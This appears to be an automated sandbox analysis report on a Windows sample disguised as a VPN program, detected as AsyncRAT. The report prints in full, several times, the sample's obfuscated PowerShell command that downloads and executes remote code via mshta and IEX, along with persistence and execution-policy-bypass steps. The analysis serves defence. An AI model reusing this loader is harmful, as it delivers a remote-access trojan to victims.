          Source: 23.0.aspnet_compiler.exe.400000.0.unpack, Client/Settings.csBase64 encoded string: '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'
          Source: 23.0.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 23.0.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 23.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 23.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: classification engineClassification label: mal92.troj.evad.winEXE@12/12@5/7
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xGrfj8RvYg.exe.logJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1564:120:WilError_01
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ligmpoba.nku.ps1Jump to behavior
          Source: xGrfj8RvYg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\xGrfj8RvYg.exe 'C:\Users\user\Desktop\xGrfj8RvYg.exe'
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: xGrfj8RvYg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: xGrfj8RvYg.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: xGrfj8RvYg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\Win 10 test Antiviru\Desktop\NORD VPN\NORD VPN\obj\Debug\NORD VPN.pdb source: xGrfj8RvYg.exe

          Data Obfuscation:

          barindex
          Obfuscated command line foundShow sources
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X Jump to behavior
          Source: xGrfj8RvYg.exeStatic PE information: 0xDE169215 [Tue Jan 27 05:52:21 2088 UTC]

          Boot Survival:

          barindex
          Yara detected AsyncRATShow sources
          Source: Yara matchFile source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6396, type: MEMORY
          Source: Yara matchFile source: 23.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Creates an undocumented autostart registry key Show sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
          Source: C:\Windows\System32\mshta.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
